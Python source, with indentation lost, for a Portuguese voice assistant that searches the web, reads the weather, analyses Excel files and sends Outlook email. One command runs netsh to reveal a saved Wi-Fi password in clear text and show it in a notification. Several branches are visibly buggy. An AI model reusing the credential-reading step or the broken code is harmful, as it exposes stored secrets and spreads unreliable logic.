if self.voz_data.isspace():
self.run()
if self.voz_data != " ":
if self.retornar_fala_de_txt_resposta(str(self.voz_data)) is None:
self.escrever_em_txt_dados(str(self.voz_data))
self.voz_data = ' '
self.run()
else:
self.engine_fala(self.retornar_fala_de_txt_resposta(str(self.voz_data)))
self.voz_data = ' '
self.run()
# comandos
def respostas(self):
cod = float(self.retornar_valor_previsto(self.voz_data))
for c in self.voz_data.split(" "):
if c not in self.vocabulario:
cod = -1
# pesquisar no google
if self.existe(['pesquise por', 'pesquisar por', 'pesquise no google por']) or int(cod) == 3:
regex = re.compile(r"\s[porsbequialcnd]+(\s.*)", flags=re.I)
termo = regex.findall(self.voz_data)
url = "http://google.com/search?q=" + str(termo[0]).strip()
webbrowser.get().open(url)
self.voz_data = ' '
self.engine_fala(f"Aqui está o que você pediu sobre {termo[0]} no google")
self.voz_data = " "
return
# gmail
elif self.existe(['email', 'entrar no gmail', 'gmail']) or int(cod) == 4:
url = "https://mail.google.com/mail/u/0/#inbox"
webbrowser.get().open(url)
self.engine_fala("O gmail está aberto")
self.voz_data = ' '
return
# youtube
elif self.existe(["pesquise no youtube"]) or int(cod) == 5:
regex = re.compile(r"\s[youtbepralgs]+\s(?:[porsbealgcind]+)?\s(?:[porsbealg]+)?(.*)", flags=re.I)
termo = regex.findall(self.voz_data)
url = "http://www.youtube.com/results?search_query=" + str(termo[0]).strip()
webbrowser.get().open(url)
self.voz_data = ' '
self.engine_fala(f"Aqui está o que você pediu sobre no {str(termo[0])} youtube")
return
# abrir algo
elif self.existe(["abrir o", "abrir a", "abrir"]) or int(cod) == 6:
regex = re.compile(r"[abrie]+\s?[\w]?\s(.*)", flags=re.I)
termo = regex.findall(self.voz_data)
self.abrir_algo(str(termo[0]))
self.voz_data = ' '
self.engine_fala(f"O {str(termo[0])} está aberto, pronto.")
return
# abrir google
elif self.existe(['abra o google']) or int(cod) == 7:
url = "http://www.google.com/"
webbrowser.get().open(url)
self.engine_fala('pronto')
self.voz_data = ' '
return
# fechar aba do chrome
elif self.existe(["fechar aba", 'fechar a', 'aba']) or int(cod) == 8:
pyautogui.PAUSE = 1
pyautogui.hotkey('ctrl', 'w')
self.engine_fala("Pronto.")
self.voz_data = ' '
return
# fechar tudo
elif self.existe(["fechar abas", 'fechar todas as abas', 'fechar tudo']) or int(cod) == 9:
pyautogui.PAUSE = 1
pyautogui.hotkey('alt', 'f4')
self.engine_fala("Pronto.")
self.voz_data = ' '
return
# escrever algo
elif self.existe(['escreva para mim', 'digite', "escreve"]) or int(cod) == 10:
if self.existe(['assunto copiado', 'assunto', 'copiado', 'escrever dados copiado']):
pyautogui.PAUSE = 1
copy(self.aux)
pyautogui.hotkey('ctrl', 'v')
self.voz_data = " "
return
escrever = self.voz_data
regex = re.compile(r"\s?[escrvapmiofdgt]+\s?(?:[escrvapmiof]+)?\s?(?:[escrvapmiof]+)?\s?(.*)", flags=re.I)
find = regex.findall(escrever)
copy(str(find[0]))
pyautogui.hotkey('ctrl', 'v')
self.voz_data = ' '
return
# falar hora
elif self.existe(['me fale as horas', 'fale as horas', 'horas', 'que horas são']) or int(cod) == 0:
self.horario()
self.voz_data = ' '
return
# falar data
elif self.existe(['me fale o dia de hoje', 'fale a data de hoje', 'que dia é hoje', 'data']) or int(cod) == 1:
self.datahj()
self.voz_data = ' '
return
# parar
elif self.existe(['parar', 'descansar', 'pausar', 'dar um tempo']) or int(cod) == 11:
self.parar()
# pesquisar na wikipedia
elif self.existe(['assunto', 'wikipedia', 'pesquise um assunto']) or int(cod) == 12:
try:
self.engine_fala('Beleza, me fale qual o assunto que você quer que eu pesquise?')
voz = self.engine_reconition_online()
if voz is None:
voz = self.pegar_comandos_separados()
set_lang("pt")
voz = str(voz).split()
resultadowik = summary(voz[0], sentences=10)
self.engine_fala('Você deseja ouvir o assunto ou escrever em outro lugar:')
while True:
voza = str(self.pegar_comandos_separados())
if 'ouvir' in voza:
self.engine_fala("Beleza, vou falar o que achei")
self.engine_fala(resultadowik)
return
elif 'escrever' in voza:
self.engine_fala("Beleza, assunto quardado na memória")
self.aux = resultadowik
break
elif 'escrever em' in voza:
self.engine_fala("Beleza, assunto quardado na memória")
self.aux = resultadowik
break
elif 'escrever em outro lugar' in voza:
self.engine_fala("Beleza, assunto quardado na memória")
self.aux = resultadowik
break
except:
self.engine_fala('Desculpe, não consegui me conectar a internet')
self.voz_data = ' '
return
# tempo
elif self.existe(['me diga o clima', 'clima', 'me diga o tempo de hoje', 'tempo de hoje', 'tempo']) or int(
cod) == 2:
try:
url = get('https://api.hgbrasil.com/weather')
url_json = url.json()
# hoje
cida = url_json['results']['city']
temperatura = url_json['results']['temp']
condicao = url_json['results']['description']
humidade = url_json['results']['humidity']
velocidade_vento = url_json['results']['wind_speedy']
self.engine_fala("O tempo")
self.engine_fala("na cidade de " + cida + ":")
self.engine_fala("A temperatura é igual a " + str(temperatura) + "°C")
self.engine_fala("A condição de hoje é: " + condicao)
self.engine_fala("A humidade é de " + str(humidade) + '%')
self.engine_fala("A velocidade do vento é de " + str(velocidade_vento))
self.engine_fala('Você deseja ver um resumo dos próximos 10 dias?')
while True:
voz = str(self.pegar_comandos_separados())
aux = ''
if 'sim' in voz:
for c in range(10):
data = url_json['results']['forecast'][c]['date']
dia = url_json['results']['forecast'][c]['weekday']
maxi = url_json['results']['forecast'][c]['max']
mini = url_json['results']['forecast'][c]['min']
descricao = url_json['results']['forecast'][c]['description']
aux += ("Data: " + str(data) + ", Dia da semana: " + str(dia) + ", Temp. máxima: " + str(
maxi) + ', Temp. mínima:' + str(mini) + ", Clima: " + str(descricao) + "\n")
pyautogui.alert(aux, title='Resumo dos próximos dias')
break
if 'não' in voz or "não quero" in voz:
self.engine_fala("Beleza, vamos fazer o que agora?")
break
except exceptions:
self.engine_fala('Desculpe, mas não consegui me conectar a a internet')
self.voz_data = ' '
return
elif self.existe(['faça uma conta para mim', 'calculadora', 'calcular', 'faça uma conta']) or int(cod) == 13:
self.calculadora()
self.voz_data = ' '
return
elif self.existe(['qr code', 'code', 'faça um qr code', 'faça um code']) or int(cod) == 14:
self.criar_qrcode()
self.voz_data = ' '
return
elif self.existe(["tirar foto da tela", "tirar foto", "foto da tela"]) or int(cod) == 15:
pyautogui.screenshot(rf"C:\Users\{getlogin()}\Desktop\my_screenshot.png")
self.engine_fala("Pronto, foto salva na área de trabalho")
self.voz_data = ' '
return
elif self.existe(["me mande uma notificação", "mande uma notificação", "notificação"]) or int(cod) == 16:
if self.existe(['assunto', "assunto copiado"]):
self.notificar(self.aux)
self.voz_data = ' '
return
self.engine_fala("Qual o assunto da notificação: ")
while True:
vozNoti = self.engine_reconition_online()
if vozNoti is None:
vozNoti = self.pegar_comandos_separados()
if vozNoti is not None:
break
self.notificar(vozNoti)
self.voz_data = ' '
return
elif self.existe(["analisar dados", "dados", "fazer uma análise", 'análise', 'tabela', 'excel']) or int(
cod) == 17:
self.engine_fala("Certo, digita para mim o nome do arquivo em Excel(o arquivo tem que está na área de "
"trabalho)")
nome = self.chamar_valor(text="Digite o nome do arquivo: ")
dirs = listdir(rf"C:\\Users\\{getlogin()}\\Desktop")
saber_se_existe = 0
for dire in dirs:
if nome in dire:
if ".xlsx" in dire or ".xlsm" in dire:
saber_se_existe += 1
else:
self.engine_fala("O nome informado não é de um arquivo em excel")
self.engine_fala("Digite novamente")
if saber_se_existe == 0:
while True:
nome = self.chamar_valor(text="Digite novamente o nome do arquivo")
for dire in dirs:
if nome in dire:
if ".xlsx" in dire or ".xlsm" in dire:
self.engine_fala("Pronto, agora foi encontrado")
saber_se_existe = 0
break
else:
self.engine_fala("O nome informado não é de um arquivo em excel")
self.engine_fala("Digite novamente")
break
if saber_se_existe == 0:
break
tabela = pd.read_excel(rf"C:\\Users\\{getlogin()}\\Desktop\\{nome}.xlsx")
colunas = tabela.columns
resultado = pd.DataFrame()
op = ""
cont = 1
for coluna in colunas:
op += f"{cont}° coluna: {coluna}\n"
cont += 1
self.engine_fala("Digita para mim o que você quer fazer(Exemplo: ColunaTal vezes ColunaTal2)?")
cont = 1
while True:
self.engine_fala("Digite break para parar, digite o p para saber as opções")
oq = self.chamar_valor(text="Digite a expressão que deseja fazer:")
try:
if "+" in oq:
conta = oq
oq = oq.split("+")
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
resultado[f"{cont}° modificação:"] = tabela[oq[0].strip()] + tabela[oq[1].strip()]
tabela[f"{cont}° modificação:"] = resultado[f"{cont}° modificação:"]
op += f"{cont}° conta entre colunas: {conta}, nome registrado: {cont}° modificação:\n"
self.engine_fala("Pronto")
cont += 1
elif "/" in oq:
conta = oq
oq = oq.split("/")
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
resultado[f"{cont}° modificação:"] = tabela[oq[0].strip()] / tabela[oq[1].strip()]
tabela[f"{cont}° modificação:"] = resultado[f"{cont}° modificação:"]
op += f"{cont}° conta entre colunas: {conta}, nome registrado: {cont}° modificação:\n"
self.engine_fala("Pronto")
cont += 1
elif "*" in oq:
conta = oq
oq = oq.split("*")
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
resultado[f"{cont}° modificação:"] = tabela[oq[0].strip()] * tabela[oq[1].strip()]
tabela[f"{cont}° modificação:"] = resultado[f"{cont}° modificação:"]
op += f"{cont}° conta entre colunas: {conta}, nome registrado: {cont}° modificação:\n"
self.engine_fala("Pronto")
cont += 1
elif "-" in oq:
conta = oq
oq = oq.split("-")
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
resultado[f"{cont}° modificação:"] = tabela[oq[0].strip()] - tabela[oq[1].strip()]
tabela[f"{cont}° modificação:"] = resultado[f"{cont}° modificação:"]
op += f"{cont}° conta entre colunas: {conta}, nome registrado: {cont}° modificação:\n"
self.engine_fala("Pronto")
cont += 1
elif "^" in oq or "**" in oq:
conta = oq
oq = oq.split("^")
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
resultado[f"{cont}° modificação:"] = tabela[oq[0].strip()] ** tabela[oq[1].strip()]
tabela[f"{cont}° modificação:"] = resultado[f"{cont}° modificação:"]
op += f"{cont}° conta entre colunas: {conta}, nome registrado: {cont}° modificação:\n"
self.engine_fala("Pronto")
cont += 1
elif "agrupar_por" in oq:
self.engine_fala("Vou avisando que não é possível integrar outras colunas ou linhas para este"
"resultado")
self.engine_fala("Apenas exportar para alguma extensão(Excel, csv, json, etc)")
# agrupar_por coluna o_que_fazer quais_colunas_querver
# 0 1 2 3 para frente
if "soma" in oq:
oq = oq.split()
coluns = []
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
for c in range(3, len(oq)):
coluns.append(oq[c])
resultado = tabela.groupby(by=str(oq[1])).sum().loc[:, coluns]
resultado.to_excel(fr"C:\Users\{getlogin()}\Desktop\resultado agrupado.xlsx")
self.engine_fala("Pronto, arquivo salvo na área de trabalho")
continue
if "media" in oq or "média" in oq:
oq = oq.split()
coluns = []
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
for c in range(3, len(oq)):
coluns.append(oq[c])
resultado = tabela.groupby(by=oq[1]).mean().loc[:, coluns]
resultado.to_excel(fr"C:\Users\{getlogin()}\Desktop\resultado agrupado.xlsx")
self.engine_fala("Pronto, arquivo salvo na área de trabalho")
continue
if "mediana" in oq:
oq = oq.split()
coluns = []
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
for c in range(3, len(oq)):
coluns.append(oq[c])
resultado = tabela.groupby(by=oq[1]).median().loc[:, coluns]
resultado.to_excel(fr"C:\Users\{getlogin()}\Desktop\resultado agrupado.xlsx")
self.engine_fala("Pronto, arquivo salvo na área de trabalho")
continue
elif "ordenar_por" in oq:
oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
try:
resultado = resultado.sort_values(by=oq[1], ascending=oq[2])
except IndexError:
resultado = resultado.sort_values(by=oq[1])
except exceptions:
resultado = resultado.sort_values(by=oq[1])
elif "menor_valor" in oq:
pyautogui.alert(title="Menor valor da tabela em memória", text=resultado.min())
elif "maior_valor" in oq:
pyautogui.alert(title="Menor valor da tabela em memória", text=resultado.max())
elif "descrição" in oq or "descricao" in oq:
pyautogui.alert(
title="Descrição das duas tabelas:", text="Tabela resultado:\n" + resultado.describe())
pyautogui.alert(text="Tabela que você subiu:\n" + tabela.describe(), title="Descrição das duas "
"tabelas:")
# aplicar trocar coluna/nome_da_tabela_que_usou dado1 dado2
elif "aplicar" in oq:
if "trocar" in oq:
if nome in oq:
oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
tabela.apply(lambda x: x.replace(oq[3], oq[4]))
else:
oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
tabela[oq[2]].apply(lambda x: x.replace(oq[3], oq[4]))
self.engine_fala("Pronto, conta feita")
# mudar conta onde_fazer o_que_fazer numero
elif "mudar" in oq and "conta" in oq:
if nome in oq and "somar" in oq:
oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
tabela.add(int(oq[4]))
else:
if "somar" in oq:
oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
resultado[oq[2]].add(int(oq[4]))
if nome in oq and "subtrair" in oq:
oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
tabela.sub(int(oq[4]))
else:
if "subtrair" in oq:
oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
resultado[oq[2]].sub(int(oq[4]))
if nome in oq and "multiplicar" in oq:
oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
tabela.mul(int(oq[4]))
else:
if "multiplicar" in oq:
oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
resultado[oq[2]].mul(int(oq[4]))
if nome in oq and "dividir" in oq:
oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
tabela.div(int(oq[4]))
else:
if "dividir" in oq:
oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
resultado[oq[2]].div(int(oq[4]))
self.engine_fala("Pronto, conta feita")
# pesquisar (expressão que deseja usar para pesquisa)
elif "pesquisar" in oq:
if nome in oq:
oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
pd.set_option("max_columns", None)
pd.set_option("max_rows", None)
pyautogui.PAUSE = 1.5
pyautogui.press("win")
pyautogui.write("Bloco de notas")
pyautogui.press("backspace")
pyautogui.press("enter")
copy(str(tabela.query(oq[1])))
pyautogui.hotkey("ctrl", "v")
else:
oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
pd.set_option("max_columns", None)
pd.set_option("max_rows", None)
pyautogui.PAUSE = 1.5
pyautogui.press("win")
pyautogui.write("Bloco de notas")
pyautogui.press("backspace")
pyautogui.press("enter")
copy(str(resultado.query(oq[1])))
pyautogui.hotkey("ctrl", "v")
elif "op" in oq:
pyautogui.alert(title="Opções de colunas para contas", text=op)
elif "break" in oq:
resultado.to_excel(fr"C:\Users\{getlogin()}\Desktop\resultado.xlsx")
tabela.to_excel(fr"C:\Users\{getlogin()}\Desktop\tabela_usada.xlsx")
self.engine_fala("Pronto, o arquivo gerado como resultado foi salvo na área de trabalho com o "
"nome resultado.xlsx")
break
else:
self.engine_fala("Você digitou algo errado ou fora das minhas configurações, por favor tente "
"novamente")
except Exception:
self.engine_fala("Você digitou algo errado ou fora das minhas configurações, por favor tente "
"novamente")
except BaseException:
self.engine_fala("Você digitou algo errado ou fora das minhas configurações, por favor tente "
"novamente")
self.voz_data = ' '
return
elif self.existe(["senha do wifi", "wifi", "descobrir senha", "senha"]) or int(cod) == 18:
self.engine_fala("Digite o nome do wifi registrado")
nome = self.chamar_valor(text="Digite o noem da wifi:")
informacoes = check_output(["netsh", "wlan", "show", "profile", nome, "key", "=", "clear"],
encoding='cp858')
for c in informacoes.split("\n"):
if "Conteúdo da chave" in c:
pos = c.find(":")
senha = c[pos + 2:]
self.notificar(senha)
self.voz_data = ' '
return
elif self.existe(["memória ram usada", "usada", "memória ram", "ram", "memória"]) or int(cod) == 19:
ram_usada = f"{virtual_memory().percent:,.2f}"
ram_disponivel = f"{virtual_memory().available * 100 / virtual_memory().total:,.2f}"
self.engine_fala(f"Memória ram usada: {ram_usada}%, Memória ram disponível: {ram_disponivel}%")
self.voz_data = ' '
return
elif self.existe(["mandar email", "mandar e-mail", "email", 'e-mail', "mandar", "enviar", "enviar email",
"enviar email"]) or int(cod) == 20:
try:
self.engine_fala("Certo, digita para mim o email da pessoa que vai recever")
outlook = win32.Dispatch('outlook.application')
email = outlook.CreateItem(0)
email.To = self.chamar_valor("Digite o email da pessoa que vai receber: ")
self.engine_fala("agora digita o assunto")
email.Subject = self.chamar_valor("Qual o assunto do email: ")
global conteudo
while True:
self.engine_fala("Você quer escrever o conteúdo ou importar de um txt?")
importar = self.pegar_comandos_separados()
if "importar" in importar or 'texto' in importar or 'arquivo' in importar or 'txt' in importar:
conteudo = str(open(fr"C:\Users\{getlogin()}\Desktop\{importar}"))
break
if "digitar" in importar or 'texto' in importar:
conteudo = self.chamar_valor("Digite o conteúdo: ")
break
while True:
self.engine_fala("O email tem anexo")
anexo_sim_nao = self.pegar_comandos_separados()
if "sim" in anexo_sim_nao:
self.engine_fala("Qual o nome do arquivo(ele precisa estar na área de trabalho)")
self.engine_fala("Ou digite o caminho inteiro do arquivo, com extensão")
arquivo = self.chamar_valor("Digite: ")
if "C:" in arquivo or ":" in arquivo or "\"" in arquivo:
email.Attachments.Add(arquivo)
break
else:
nome_arquivo = arquivo
anexo = rf"C:\Users\{getlogin()}\Desktop\{nome_arquivo}"
email.Attachments.Add(anexo)
break
if "não" in anexo_sim_nao:
break
css = '''
<style>
.email p {
font-size: 20px;
color: gray;
font-family: Arial, Helvetica, sans-serif;
}
</style>
'''
email.HTMLBody = f'''
<!DOCTYPE html>
<html>
<html lang="pt-BR">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
{css}
</head>
<body>
<section class="email">
<p>{conteudo}</p>
</section>
</body>
</html>
'''
email.Send()
self.voz_data = ' '
return
except:
self.engine_fala("Desculpe, ouve um erro")
self.engine_fala("O outlook não está configurando ou não consegui me conectar a internet")
else:
# options apps
if self.existe(self.opcoes):
self.abrir_algo(self.voz_data.lower())
elif self.existe(['fale as opções', 'opções de aplicativos', 'opções']):
self.engine_fala("Você deseja atualizar a lista de opções?")
self.engine_fala('beleza, vou te falar as opções, por favor diga apenas o número da opção que você '
'quer '
'depois de fechar a janela.')
self.engine_fala('As opções são: ')
aux = ''
cont = 1
for op in self.opcoes:
aux += f'{cont}° opção é: {op}\n'
cont += 1
pyautogui.alert(aux, title='Opções')
self.engine_fala('qual opção você quer?')
while True:
vozn = self.pegar_comandos_separados()
vozn = self.ajeitar_numero(vozn)
if type(vozn) == int:
self.abrir_algo(self.opcoes[vozn])
return
@staticmethod
def ajeitar_numero(numero):
nums = ['um', 'dois', 'três', 'quatro', 'cinco', 'seis', 'sete', 'oito', 'nove', 'dez']
for n in nums:
if n in numero:
return nums.index(n) + 1
def escrever_em_txt_dados(self, lista_palavras):
lista_frases = []
contR = int(self.arquivoF[-2]) + 1
with open(r"databaseF.txt", 'a', encoding='utf-8') as Fd:
lista_palavras = lista_palavras.replace(" ", "_")
Fd.write('\n')
Fd.write(f'{contR} ')
Fd.write(f'{lista_palavras} ')
self.engine_fala("Quais são as possíveis respostas para essa pergunta?")
self.engine_fala("fale 'break'/'parar' para parar!!!")
while True:
aux = self.engine_reconition_online()
if aux is None:
aux = self.pegar_comandos_separados()
if aux is not None:
if 'break' == aux:
break
if 'parar' == aux:
break
self.engine_fala("Pronto, frase salva no banco de dados")
lista_frases.append(aux)
self.escrever_em_txt_resposta(lista_frases, contR)
self.engine_fala("Pronto, frases salvas no banco de dados")
@staticmethod
def escrever_em_txt_resposta(lista_palavras, cont):
with open(r"databaseR.txt", 'a', encoding='utf-8') as R:
for passw in lista_palavras:
passw = passw.replace(" ", "_")
R.write('\n')
R.write(f'{cont} ')
R.write(f'{passw} ')
def retornar_fala_de_txt_resposta(self, fala):
try:
index = int(self.arquivoF[self.arquivoF.index(fala.replace(" ", "_")) - 1])
resposta = []
for c in range(int(self.arquivoR.index("1")), len(self.arquivoR), 2):
if int(self.arquivoR[c]) == int(index):
resposta.append(self.arquivoR[c + 1])
if len(resposta) > 1:
return resposta[randint(0, len(resposta) - 1)].replace("_", " ")
return resposta[0].replace("_", " ")
except ValueError:
return None
def fechar_assistente(self):
self.engine_fala("Tenha um bom dia! até logo!")
with open('rede_neural.xml', 'wb') as fi:
dump(self.netWork, fi)
janela.attributes("-topmost", True)
self.is_run = False
janela_aparecer.fechar()
exit(0)
def run(self):
while self.is_run:
try:
self.voz_data = self.engine_reconition_online()
if self.voz_data is None:
data = stream.read(8000)
if len(data) == 0:
break
if rec.AcceptWaveform(data):
resultado = rec.FinalResult()
resultado = loads(resultado)
if resultado is not None:
self.voz_data = resultado['text'].lower()
self.conversas()
else:
self.conversas()
except sr.WaitTimeoutError:
self.engine_fala('Por favor, não fique muito tempo sem falar')
continue
def criar_qrcode(self):
self.engine_fala("Você deseja criar vários qr codes ou apenas um?")
try:
while True:
voz = self.engine_reconition_online()
if voz is None:
voz = self.pegar_comandos_separados()
if voz is not None:
break
if 'apenas um' in voz or 'um' in voz or 'apenas' in voz:
self.engine_fala('Beleza, digita para mim o link que você deseja usar para criar o QR code')
link = self.chamar_valor(text="Digite o link: ")
self.engine_fala('Agora digite para mim o nome do arquivo: ')
nome = self.chamar_valor(text="Digite o nome do arquivo: ")
self.engine_fala('Certo, espera um pouco aí...')
meu_qrcode = qrcode.make(link)
meu_qrcode.save(fr"C:\Users\{getlogin()}\Desktop\qrcode_{nome}.png")
self.engine_fala("Pronto, já está na sua área de trabalho")
else:
self.engine_fala('Beleza, quantos você quer fazer?')
while True:
vozq = self.engine_reconition_online()
if vozq is None:
vozq = self.pegar_comandos_separados()
vozq = self.ajeitar_numero(vozq)
if vozq is not None:
break
links = {}
for c in range(int(vozq)):
nome = self.chamar_valor(text=f"{(c + 1)}°: Digite o nome do arquivo: ")
link = self.chamar_valor(text=f"{(c + 1)}°: Digite o link: ")
links[f'{nome}'] = str(link)
for produto in links:
meu_qrcode = qrcode.make(links[produto])
meu_qrcode.save(rf"C:\Users\{getlogin()}\Desktop\qrcode_{produto}.png")
self.engine_fala('Pronto, qr codes feitos')
except BaseException:
self.engine_fala('Desculpe, não pude realizar o processo, algo deu errado')
def calculadora(self):
self.engine_fala('Beleza, o que você deseja calcular?')
self.engine_fala('Por favor, falar apenas equações simples, afinal estou em fase de desenvolvimento')
try:
while True:
voz = str(self.engine_reconition_online().lower())
if voz is None:
voz = self.pegar_comandos_separados().lower()
break
if voz is not None:
break
voz = voz.split()
while True:
indexAux = ''
if str(voz).count("fatorial"):
nums = self.separar(voz, (voz.index("fatorial")))
num = nums[1]
valor_total = 1
for c in range(1, num + 1):
valor_total *= c
valor_total = int(valor_total)
voz.insert(int(voz.index("fatorial")), str(valor_total))
voz.remove("fatorial")
voz.remove("de")
voz.remove(str(nums[1]))
continue
if str(voz).count('elevado') != 0:
if '^' in voz:
indexAux = '^'
if 'elevado' in voz:
indexAux = 'elevado'
nums = self.separar(voz, (voz.index(indexAux)))
valor_total = pow(nums[0], nums[1])
valor_total = int(valor_total)
voz.insert(int(voz.index(indexAux)), str(valor_total))
voz.remove(indexAux)
if indexAux == 'elevado':
voz.remove('a')
voz.remove(str(nums[0]))
voz.remove(str(nums[1]))
continue
if str(voz).count('x') != 0 or str(voz).count('vezes') != 0:
if 'x' in voz:
indexAux = 'x'
if 'vezes' in voz:
indexAux = 'vezes'
nums = self.separar(voz, voz.index(indexAux))
valor_total = (nums[0] * nums[1])
voz.insert(int(voz.index(indexAux)), str(valor_total))
voz.remove(indexAux)
voz.remove(str(nums[0]))
voz.remove(str(nums[1]))
continue
if str(voz).count('/') != 0 or str(voz).count('dividido') != 0 or str(voz).count("÷"):
if '÷' in voz:
indexAux = '÷'
if 'dividido' in voz:
indexAux = 'dividido'
if '/' in voz:
indexAux = '/'
nums = self.separar(voz, voz.index(indexAux))
valor_total = (nums[0] / nums[1])
voz.insert(int(voz.index(indexAux)), str(valor_total))
voz.remove(indexAux)
if indexAux == "dividido":
voz.remove("por")
voz.remove(str(nums[0]))
voz.remove(str(nums[1]))
continue
if str(voz).count('somado') != 0 or str(voz).count('+') != 0:
if '+' in voz:
indexAux = '+'
if 'somado' in voz:
indexAux = 'somado'
nums = self.separar(voz, voz.index(indexAux))
valor_total = (nums[0] + nums[1])
voz.insert(int(voz.index(indexAux)), str(valor_total))
voz.remove(indexAux)
if indexAux == 'somado':
voz.remove('a')
voz.remove(str(nums[0]))
voz.remove(str(nums[1]))
continue
if str(voz).count('subtraido') != 0 or str(voz).count('-') != 0:
if '-' in voz:
indexAux = '-'
if 'subtraido' in voz:
indexAux = 'subtraido'
nums = self.separar(voz, voz.index(indexAux))
valor_total = (nums[0] - nums[1])
voz.insert(int(voz.index(indexAux)), str(valor_total))
voz.remove(indexAux)
if indexAux == 'subtraido':
voz.remove('de')
voz.remove(str(nums[0]))
voz.remove(str(nums[1]))
continue
if not str(voz).isalnum():
self.engine_fala('Deseja ouvir o resultado ou colar em algum lugar?')
while True:
vozsair = self.engine_reconition_online()
if vozsair is None:
vozsair = self.pegar_comandos_separados().lower()
break
if vozsair is not None:
vozsair = vozsair.lower()
break
if 'colar' in vozsair:
self.aux = vozsair
break
if 'ouvir' in vozsair:
self.engine_fala('O resultado é:' + str(voz).strip('[]').replace("'", ""))
break
if not str(voz).isalpha():
self.engine_fala("Pronto")
self.engine_fala("Retornando ao módulo principal")
except BaseException:
self.engine_fala("Desculpe, algo deu errado")
self.engine_fala("Pode ter sido a conexão, ou algum valor inválido")
@staticmethod
def separar(voz_data, index=0):
aux1 = 0
aux2 = 0
for c in range(index, -1, -1):
if voz_data[c].isnumeric():
aux1 = voz_data[c]
break
for c2 in range(index, len(voz_data)):
if voz_data[c2].isnumeric():
aux2 = voz_data[c2]
break
return [int(aux1), int(aux2)]
@staticmethod
def engine_fala(text):
"""
fala da assitente virtual
"""
text = str(text)
voices = engine.getProperty('voices')
engine.setProperty('voice', voices[0].id)
engine.say(text)
engine.runAndWait()
def engine_reconition_online(self):
r = sr.Recognizer()
with sr.Microphone() as source:
audio = r.listen(source, 5, 5)
try:
self.voz_data = r.recognize_google(audio, language='pt')
return self.voz_data.lower()
except sr.UnknownValueError:
self.engine_fala(self.retornar_fala_de_txt_resposta("ei"))
except sr.RequestError:
return None
def Boas_vindas(self):
hora = int(datetime.now().hour)
if 0 < hora < 12:
self.engine_fala('Olá')
self.engine_fala('Bom dia')
elif 12 <= hora < 18:
self.engine_fala('Agora não é mais de manhã')
self.engine_fala('Já passou do meio dia')
self.engine_fala('Estamos no período da tarde')
self.engine_fala('Boa tarde')
else:
self.engine_fala('Agora não é de manhã')
self.engine_fala('Já estamos no período noturno')
self.engine_fala('Boa noite')
self.engine_fala(f'Oi {self.pessoa}, como você está?')
voz = self.pegar_comandos_separados()
if 'estou' in voz or 'obrigado' in voz or 'bem' in voz:
self.engine_fala('que bom, então, vamos fazer alguma coisa?')
voz = self.pegar_comandos_separados()
if 'bora' in voz:
self.engine_fala('Beleza, bora')
self.run()
elif 'beleza' in voz:
self.engine_fala('Beleza, bora')
self.run()
elif 'claro' in voz:
self.engine_fala('Beleza, bora')
self.run()
elif "vamor" in voz:
self.engine_fala('Beleza, bora')
self.run()
@staticmethod
def notificar(text=''''''):
notification.notify(title="R.O.X.X.A.N.E", message=text, timeout=20)
def horario(self):
hora = datetime.now()
self.engine_fala('Agora ' + hora.strftime('São %H horas e %M minutos'))
def datahj(self):
data = date.today()
semana = ('Segunda-feira', 'Terça-feira', 'Quarta-feira', 'Quinta-feira', 'Sexta-feira', 'Sábado', 'Domingo')
meses = ('Janeiro', 'Fevereiro', 'Março', 'Abril', 'Maio', 'Junho', 'Julho', 'Agosto', 'Setembro', 'Outubro',
'Novembro', 'Dezembro')
mesatual = (meses[data.month])
ano = data.strftime(" de %Y")
self.engine_fala("Hoje é " + semana[data.weekday()])
self.engine_fala("Dia " + str(data.day) + mesatual + ano)
def abrir_algo(self, name):
pyautogui.PAUSE = 1.2
pyautogui.press('win')
pyautogui.write(name)
pyautogui.press('backspace')
pyautogui.press('enter')
self.run()
def chamar_valor(self, text=''):
try:
self.tela_valor_digitado(texto=text)
except BaseException:
self.pegar_valor()
return self.var
def pegar_valor(self):
try:
self.var = self.entradac.get()
except BaseException:
self.var = None
self.janelac.destroy()
def tela_valor_digitado(self, texto):
self.janelac = Tk()
self.janelac.title(f"{self.nome_assistente} por chat")
textoc = Label(self.janelac, text=texto)
textoc.grid(column=0, row=1, padx=25, pady=50)
self.entradac = Entry(self.janelac)
self.entradac.grid(column=0, row=2, padx=60, pady=10)
botaoc = Button(self.janelac, text="OK", command=self.pegar_valor)
botaoc.grid(column=0, row=3, padx=60, pady=10)
self.janelac.geometry("270x200")
self.janelac.resizable(0, 0)
self.janelac.mainloop()
def parar(self):
self.engine_fala('Beleza')
self.engine_fala('estou aqui te esperando')
self.engine_fala('se precisar de algo, só dizer para voltar')
while True:
voz = self.pegar_comandos_separados()
if "está" in voz or "aí" in voz:
self.notificar("Estou aqui sim, esperando você chamar, para chamar basta dizer 'voltar' ou "
"'retornar'")
elif 'voltar' in voz:
self.engine_fala('Ok')
self.engine_fala('Voltando')
self.engine_fala('Não me deixe sozinha por muito tempo')
self.engine_fala('vamos fazer alguma coisa logo')
self.run()
elif 'retornar' in voz:
